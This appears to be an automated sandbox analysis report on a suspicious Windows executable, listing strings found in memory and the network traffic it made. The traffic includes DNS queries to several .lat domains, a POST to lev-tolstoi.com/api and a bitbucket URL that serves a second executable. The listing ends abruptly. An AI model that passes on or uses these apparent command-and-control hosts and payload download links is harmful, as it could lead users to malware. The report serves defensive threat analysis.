                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Per equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https:// equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: jSFUzuYPG9.exe, 00000000.00000002.1979443513.00000000064D9000.00000002.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1649934312.0000000005EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1450248391.0000000005E19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aspecteirs.lat/
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/f
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976145039.00000000012FB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe3
                Source: jSFUzuYPG9.exe, 00000000.00000003.1650190340.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976712715.00000000016AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/z
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: jSFUzuYPG9.exeString found in binary or memory: https://community.fastly.
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRt
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 